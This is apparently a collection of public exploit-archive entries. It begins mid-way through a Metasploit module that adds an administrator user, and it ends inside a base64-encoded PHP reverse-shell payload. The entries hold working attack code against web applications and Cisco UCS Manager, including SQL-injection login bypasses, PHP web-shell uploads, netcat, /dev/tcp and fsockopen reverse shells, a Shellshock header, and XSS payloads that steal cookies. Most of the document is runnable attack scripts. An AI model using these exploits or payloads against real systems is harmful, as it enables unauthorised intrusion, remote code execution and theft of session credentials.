["/discovery/list"], "perm_key": "discovery:view"}, {"data": ["/pal/property/get"], "perm_key": "property:view"}, {"data": ["/sepon-core/node/move"], "perm_key": "edge:move"}, {"data": ["/asup/pal"], "perm_key": "asup:pal"}, {"data": ["/authentication-server/role/delete"], "perm_key": "role:delete"}, {"data": ["/pal/switchinfo/update"], "perm_key": "topology:edit"}, {"data": ["/pal/olt-location/delete"], "perm_key": "oltlocation:delete"}, {"data": ["/bbsl*/onu/disable", "/bbsl*/onu/enable"], "perm_key": "onu:statuschange"}, {"data": ["/alarm-manager/event/definition/list", "/alarm-manager/event/log/list", "/alarm-manager/event/log/search"], "perm_key": "event:view"}, {"data": ["/pal/technologyprofile/delete", "/sepon-core/profile/delete/tech"], "perm_key": "tech_profiles:delete"}, {"data": ["/pal/speedprofile/add", "/pal/speedprofile/create", "/sepon-core/profile/add/speed"], "perm_key": "speed_profiles:edit"}, {"data": ["/authentication-server/role/add", "/authentication-server/role/update"], "perm_key": "role:edit"}, {"data": ["/edge-*"], "perm_key": "gateway-test:view"}, {"data": ["/bbsl*/olt/add", "/sepon-core/node/update"], "perm_key": "olt:edit"}, {"data": ["/service-admin"], "perm_key": "service-admin:view"}, {"data": ["/asup/seba-central"], "perm_key": "asup:core"}, {"data": ["/alarm-manager/mailNotification/add", "/alarm-manager/mailNotification/update", "/alarm-manager/mailNotification/delete"], "perm_key": "alarm-mail:edit"}, {"data": ["/pal/securityprofile/get", "/pal/securityprofile/list", "/sepon-core/profile/get/security", "/sepon-core/profile/list/security"], "perm_key": "security_profiles:view"}, {"data": ["/alarm-manager/mailNotification/list", "/alarm-manager/mailNotification/active/list", "/alarm-manager/mailNotification/get"], "perm_key": "alarm-mail:view"}, {"data": ["/bbsl*/subscriber/delete", "/bbsl*/subscriber/delete-all-subscriber", "/bbsl*/subscriber/delete-list-of-service"], "perm_key": "subscriptions:delete"}, {"data": ["/bbsl*/olt/disable", "/bbsl*/olt/enable"], "perm_key": "olt:statuschange"}, {"data": ["/authentication-server/permission/list", "/authentication-server/permission/getByUser"], "perm_key": "permission:view"}, {"data": ["/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "uiconfig:edit"}, {"data": ["/response-code"], "perm_key": "gateway:response-code"}, {"data": ["/pal/speedprofile/all", "/pal/speedprofile/get", "/pal/speedprofile/list", "/sepon-core/profile/get/speed", "/sepon-core/profile/list/speed"], "perm_key": "speed_profiles:view"}, {"data": ["/pal/ont/device", "/pal/ont/uniport", "/pal/ont/whitelist", "/pal/inventory/onu-list", "/pal/ont/stats-by-olt-number", "/pal/ont/stats-by-pon-port-number", "/pal/ont/search"], "perm_key": "onu:view"}, {"data": ["/pal/securityprofile/delete", "/sepon-core/profile/delete/security"], "perm_key": "security_profiles:delete"}, {"data": ["/pal/securityprofile/add", "/pal/securityprofile/create", "/sepon-core/profile/add/security"], "perm_key": "security_profiles:edit"}, {"data": ["/temip_integration/get_alarm_list"], "perm_key": "temip:view"}, {"data": ["/authentication-server/session/list"], "perm_key": "session:view"}, {"data": ["/stats-manager/response-code"], "perm_key": "stat:response-code"}, {"data": ["/bbsl*/onu/delete-onu"], "perm_key": "onu:delete"}, {"data": ["/pal/olt-location/get", "/pal/inventory/olt-location-list", "/sepon-core/node/list/oltLocation"], "perm_key": "oltlocation:view"}, {"data": ["/pal/technologyprofile/add", "/sepon-core/profile/add/tech"], "perm_key": "tech_profiles:edit"}]}, {"locations": [], "name": "default", "permList": [{"data": ["/user/add"], "perm_key": "default"}]}, {"locations": [{"id": 1, "name": "root"}], "name": "root", "permList": []}], "status": "ACTIVE", "username": "' + datastore["USERNAME"] + '"}}' res = send_request_raw({ 'method' => 'POST', 'ctype' => 'application/json', 'uri' => normalize_uri(target_uri.path, 'authentication-server', 'user', 'add'), 'cookie' => cookie, 'data' => json_data }) if res.code == 200 and res.body.include? '"SUCCESS"' print_good("Excellent! User #{datastore["USERNAME"]} was added successfully with root, admin and default privileges.") print_good("Username : #{datastore["USERNAME"]}") print_good("Password : #{datastore["PASSWORD"]}") break end end end end

# Exploit Title: E-Learning System 1.0 - Authentication Bypass & RCE # Exploit Author: Himanshu Shukla & Saurav Shukla # Date: 2021-01-15 # Vendor Homepage: https://www.sourcecodester.com/php/12808/e-learning-system-using-phpmysqli.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/caiwl.zip # Version: 1.0 # Tested On: Kali Linux + XAMPP 7.4.4 # Description: E-Learning System 1.0 - Authentication Bypass Via SQL Injection + Remote Code Execution #Step 1: run the exploit in python with this command: python3 exploit.py #Step 2: Input the URL of the vulnerable application: Example: http://10.10.10.23/caiwl/ #Step 3: Input your LHOST where you want the reverse shell: Example: 10.9.192.23 #Step 4: Input your LPORT that is the port where the reverse shell will spawn: Example: 4444 #Step 5: Start a Netcat Listener on the port specified in Step 4 using this command: nc -lnvp 4444 #Step 6: Hit enter on the if your Netcat Listener is ready, and you will get a reverse shell as soon as you hit enter. import requests print('########################################################') print('## E-LEARNING SYSTEM 1.0 ##') print('## AUTHENTICATION BYPASS & REMOTE CODE EXECUTION ##') print('########################################################') print('Author - Himanshu Shukla & Saurav Shukla') GREEN = '\033[32m' # Green Text RED = '\033[31m' # Red Text RESET = '\033[m' # reset to the defaults #Create a new session s = requests.Session() #Set Cookie cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'} LINK=input("Enter URL of The Vulnarable Application : ") #Authentication Bypass print("[*]Attempting Authentication Bypass...") values = {"user_email":"'or 1 or'", "user_pass":"lol","btnLogin":""} r=s.post(LINK+'admin/login.php', data=values, cookies=cookies) r=s.post(LINK+'admin/login.php', data=values, cookies=cookies) #Check if Authentication was bypassed or not. logged_in = True if("You login as Administrator." in r.text) else False l=logged_in if l: print(GREEN+"[+]Authentication Bypass Successful!", RESET) else: print(RED+"[-]Failed To Authenticate!", RESET) #Creating a PHP Web Shell phpshell = { 'file': ( 'shell.php', '<?php echo shell_exec($_REQUEST["cmd"]); ?>', 'application/x-php', {'Content-Disposition': 'form-data'} ) } # Defining value for form data data = {'LessonChapter':'test', 'LessonTitle':'test','Category':'Docs','save':''} #Uploading Reverse Shell print("[*]Uploading PHP Shell For RCE...") upload = s.post(LINK+'/admin/modules/lesson/controller.php?action=add', cookies=cookies, files=phpshell, data=data, verify=False) shell_upload = True if("window.location='index.php'" in upload.text) else False u=shell_upload if u: print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET) else: print(RED+"[-]Failed To Upload The PHP Shell!", RESET) print("[*]Please Input Reverse Shell Details") LHOST=input("[*]LHOST : ") LPORT=input("[*]LPORT : ") print('[*]Start Your Netcat Listener With This Command : nc -lvnp '+LPORT) input('[*]Hit Enter if your netcat shell is ready. ') print('[+]Deploying The Web Shell...') #Executing The Webshell e=s.get('http://192.168.1.5/caiwl/admin/modules/lesson/files/shell.php?cmd=nc 192.168.1.2 9999 -e /bin/bash', cookies=cookies) exit()

# Exploit Title: Alumni Management System 1.0 - "Last Name field in Registration page" Stored XSS # Exploit Author: Siva Rajendran # Date: 2020-12-31 # Vendor Homepage: https://www.sourcecodester.com/php/14524/alumni-management-system-using-phpmysql-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14524&title=Alumni+Management+System+using+PHP%2FMySQL+with+Source+Code # Affected Version: Version 1 # Tested on: Windows 10, Firefox Version 84.0 Step 1. Go to sign up page Step 2. In the "Last Name" field, use the following XSS payload "><img src=xx onerror=alert(document.cookie)> as the name and click on save. Step 3. This should trigger the Stored XSS payload in admin panel users tab, once the admin login into the application to verify the registered users email address. The attacker steals the admin session cookie

# Exploit Title: Cisco UCS Manager 2.2(1d) - Remote Command Execution # Description: An unspecified CGI script in Cisco FX-OS before 1.1.2 on Firepower 9000 devices and Cisco Unified Computing System (UCS) Manager before 2.2(4b), 2.2(5) before 2.2(5a), and 3.0 before 3.0(2e) allows remote attackers to execute arbitrary shell commands via a crafted HTTP request, aka Bug ID CSCur90888. # Date: 1/15/2021 # Exploit Author: liquidsky (J.McPeters) # Vulnerable Software: Cisco UCS Manager - 2.2(1d) -> [According to the vendor (cisco), this is known to impact versions prior to 3.0(2e).] # Vendor Homepage : https://www.cisco.com/c/en/us/products/servers-unified-computing/ucs-manager/index.html # Version: 2.2(1d), 2.2(3c)A # Cisco Reference: https://quickview.cloudapps.cisco.com/quickview/bug/CSCur90888 # Tested On: Cisco UCS Manager - 2.2(1d) (Exploit ran with Debian 5.6.7-1kali1 (Kali 2020.1 x64)) # Author Site: https://github.com/fuzzlove/Cisco-UCS-Manager-2.2-1d-Remote-Command-Execution # Special Notes: This application by default uses outdated TLS 1.0 for communication, so thats why there is a quickfix/temporary patch to 1.0 in openssl utilizing 'sed' (that gets changes back after exploitation). # # Greetz: wetw0rk, Fr13ndz, O.G.Xx25, MS, SS, JK, the S3 family, and last but NOT least droppunx ^_~ # import sys, ssl, os, time import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) print "+-------------------------------------------------------------+" print print "- Cisco Unified Computing System Manager CGI RCE " print print " Cisco UCS Manager - 2.2(1d)" print print "- PoC by: LiquidSky - 1/15/21 | CISCO-BUG-ID: CSCur90888 " print print "+-------------------------------------------------------------+" try: target = sys.argv[1] shellip = sys.argv[2] shellport = sys.argv[3] except IndexError: print print "- Usage: %s <vuln-site> <listener-ip> <listener-port>" % sys.argv[0] print "- Example: %s https://ciscoucsmgr 192.168.1.123 443" % sys.argv[0] print sys.exit() def ch3x_w00t(): if os.geteuid()==0: print "[*] Running exploit as root." else: print "[!] You are not root, be sure you can change /etc/ssl/openssl.cnf" print "[x] Most likely going to see an error..." time.sleep(5) # Performs backup of openssl.cnf just in case and performs checks of existing vulnerable pages... def cisco_vuln(): ch3x_w00t() print "[x] Backing up /etc/ssl/openssl.cnf to /etc/ssl/openssl.bak (just in case)" os.system("cp /etc/ssl/openssl.cnf /etc/ssl/openssl.bak") os.system("sed -i 's/MinProtocol = TLSv1.2/MinProtocol = TLSv1.0/' /etc/ssl/openssl.cnf") print "[*] Checking vulnerable URL " headers1 = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} cisco_url = "" + target + "/ucsm/isSamInstalled.cgi" #Checking page check = requests.get(cisco_url, headers=headers1, verify=False) #Grabbing response res = check.text if "true" in res: return True return False # Safety check - make sure the user is okay with the TLS1.0 temp fix # Shout out to Dean ^^ for keeping me polite... def exploit_question(): print "[x] Warning the service by default uses TLS1.0 so . . ." print print "[?] This exploit temporarily patches '/etc/ssl/openssl.cnf' to use TLS1.0 using 'sed' and then changes back to TLS1.2" print print "[!] A backup is placed in /etc/ssl/openssl.bak just to be safe..." print question = raw_input('[!] Do you wish to continue, "yes" or "no" ?') if question == 'yes': print print "[!] Great attempting exploitation checks: " + target + '!' cisco_vuln() else: print print "[x] Stay safe m8 ;) - Read the source, its safe . . " print sys.exit() exploit_question() def cisco_response(): headers1 = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} cisco_url = "" + target + "/ucsm/isSamInstalled.cgi" request = requests.get(cisco_url, headers=headers1, verify=False) if request.status_code == 200: print "[x] Page seems to exist -- Possibly vulnerable?" else: print "[!] Page does not exist - Not vulnerable" print "[x] Switching back to TLS v1.2 - backup file should be in /etc/ssl/openssl.bak (just in case)" os.system("sed -i 's/MinProtocol = TLSv1.0/MinProtocol = TLSv1.2/' /etc/ssl/openssl.cnf") sys.exit() def cisco_exploit(): cisco_url = "" + target + "/ucsm/isSamInstalled.cgi" headers = {"User-Agent": "() { ignored;};/bin/bash -i >& /dev/tcp/" + shellip + "/" + shellport + " 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} print "[x] Sending Shell to IP: " + shellip + " Port: " + shellport + "" print "[?] If this works you will see the exploit hang" requests.get(cisco_url, headers=headers, verify=False) print "[!] Shell Sent" cisco_exploit() def main(): if cisco_vuln(): print "" print "[+] Perhaps success?" print "" print " ^_~ got shellz? - [ liquidsky | 2021 ]" print print "[x] Switching back to TLS v1.2 - backup file should be in /etc/ssl/openssl.bak (just in case)" os.system("sed -i 's/MinProtocol = TLSv1.0/MinProtocol = TLSv1.2/' /etc/ssl/openssl.cnf") else: print "[-] failure!" print "[x] Switching back to TLS v1.2 - backup file should be in /etc/ssl/openssl.bak (just in case)" os.system("sed -i 's/MinProtocol = TLSv1.0/MinProtocol = TLSv1.2/' /etc/ssl/openssl.cnf") if __name__ == "__main__": main()

# Exploit Title: Xwiki CMS 12.10.2 - Cross Site Scripting (XSS) # Date: 17-01-2021 # Exploit Author: Karan Keswani # Vendor Homepage: https://www.xwiki.org/xwiki/bin/view/Main/WebHome # Software Link: https://www.xwiki.org/xwiki/bin/view/Download/ # Version: Xwiki CMS- 12.10.2 # Tested on: Windows 10 # Description: XWiki 12.10.2 allows XSS via an SVG document to the upload feature of the comment section. # Additional Information: Well I found this vulnerability in Xwiki project based websites but they did not respond so i installed a latest version of Xwiki CMS and hosted on localhost with help of Wamp and then i exploited that vulnerability. # Attack Vector: 1) Create 2 accounts:- 1)Victim & 2)Attacker 2) Login with victim account, there is a option to create new dashboard and there is page says give title and type.( Type of Dashboard:-I created simple page) 3) Now save view the page, 4) Now login with attacker account and search and open the dashboard which has been created by victim, 5) When you open the dashboard there is a comment section option, Go to that comment section & add a comment,there is a upload functionality, 6) So i tried to upload a sample svg file to check that it will allow to upload .svg format 7) Now i created a text file with XSS payload and then saved it as a .svg format 8) Upload your .svg file and click on send it to the server and click ok (your comment will be add) 9) Now open that comment with the victim account and click on that view image you'll see the xss pop-up. Xss Payload:- <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <svg onload="alert('xss')" xmlns="http://www.w3.org/2000/svg"> </svg>

# Exploit Title: Life Insurance Management System 1.0 - 'client_id' SQL Injection # Date: 15/1/2021 # Exploit Author: Aitor Herrero # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14665/life-insurance-management-system-php-full-source-code.html # Version: 1.0 # Tested on: Windows /linux / Login in the application Go to clientStatus.php?client_id= sqlmap -u "http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129'%20and%20sleep(20)%20and%20'1'='1 <http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129%27%20and%20sleep(20)%20and%20%271%27=%271>"

# Exploit Title: osTicket 1.14.2 - SSRF # Date: 18-01-2021 # Exploit Author: Talat Mehmood # Vendor Homepage: https://osticket.com/ # Software Link: https://osticket.com/download/ # Version: <1.14.3 # Tested on: Linux # CVE : CVE-2020-24881 osTicket before 1.14.3 suffers from Server Side Request Forgery [SSRF]. HTML page is rendered on backend server on calling "Print" ticket functionality. Below are the steps to reproduce this vulnerability: 1. Create a new ticket 2. Select "HTML Format" format. 3. Add an image tag with your payload in src attribute i.e. "<img src=https://mymaliciouswebsite.com"> 4. After submitting this comment, print this ticket. 5. You'll receive a hit on your malicious website from the internal server on which osTicket is deployed. For more details, read my following blog: https://blackbatsec.medium.com/cve-2020-24881-server-side-request-forgery-in-osticket-eea175e147f0 https://nvd.nist.gov/vuln/detail/CVE-2020-24881

# Exploit Title: ChurchRota 2.6.4 - RCE (Authenticated) # Date: 1/19/2021 # Exploit Author: Rob McCarthy (@slixperi) # Vendor Homepage: https://github.com/Little-Ben/ChurchRota # Software Link: https://github.com/Little-Ben/ChurchRota # Version: 2.6.4 # Tested on: Ubuntu import requests from pwn import listen ############################################################################################################ # Description # # Church Rota version 2.6.4 is vulnerable to authenticated remote code execution. # # The user does not need to have file upload permission in order to upload and execute an arbitrary file. # # The application is written primarily with PHP so we use PHP in our PoC # ############################################################################################################ # credentials of the low privilege user USERNAME='slixperi' PASSWORD='slixperi' LISTENER_IP = '127.0.0.1' LISTENER_PORT = '4444' TARGET_IP = '127.0.0.1' TARGET_PORT = '8081' # set the credentials for login POST credentials = {"username":USERNAME,"password":PASSWORD} # create a session to preserve session state sesh = requests.session() # login as our low-privilege user (normally only admins can upload files) sesh.post(f"http://{TARGET_IP}:{TARGET_PORT}/login.php", data=credentials) # define the payload payload = f"<?php $sock=fsockopen(\"{LISTENER_IP}\",{LISTENER_PORT});$proc=proc_open(\"/bin/sh -i\", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>" # file upload sesh.headers.update({"Referer": f"http://{TARGET_IP}:{TARGET_PORT}/resources.php?action=new"}) files = {'resourcefile': ("shell.php", payload)} sesh.post(f"http://{TARGET_IP}:{TARGET_PORT}/resources.php?action=newsent", files=files) l = listen(LISTENER_PORT) # execute the file sesh.get(f"http://{TARGET_IP}:{TARGET_PORT}/documents/shell.php") l.interactive()

# Exploit Title: Life Insurance Management System 1.0 - File Upload RCE (Authenticated) # Date: 15/1/2021 # Exploit Author: Aitor Herrero # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14665/life-insurance-management-system-php-full-source-code.html # Version: 1.0 # Tested on: Windows /linux / Login in the application Go to Clients and you can add new client o modify existent Click examination botton and upload a test.php with content: "<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>" Click Upload and intercept with burpsuite Change the content type to image/png Go to the path http://localhost:8080/lims/uploads/test.php?cmd=dir

# Exploit Title: Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution) # Date: 19/01/2021 # Exploit Author: Richard Jones # Vendor Homepage:https://www.sourcecodester.com/php/12306/voting-system-using-php.html # Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Windows 10 2004 + XAMPP 7.4.4 import requests # --- Edit your settings here ---- IP = "192.168.1.207" # Website's URL USERNAME = "potter" #Auth username PASSWORD = "password" # Auth Password REV_IP = "192.168.1.207" # Reverse shell IP REV_PORT = "8888" # Reverse port # -------------------------------- INDEX_PAGE = f"http://{IP}/votesystem/admin/index.php" LOGIN_URL = f"http://{IP}/votesystem/admin/login.php" VOTE_URL = f"http://{IP}/votesystem/admin/voters_add.php" CALL_SHELL = f"http://{IP}/votesystem/images/shell.php" payload = """ <?php header('Content-type: text/plain'); $ip = "IIPP"; $port = "PPOORRTT"; $payload = "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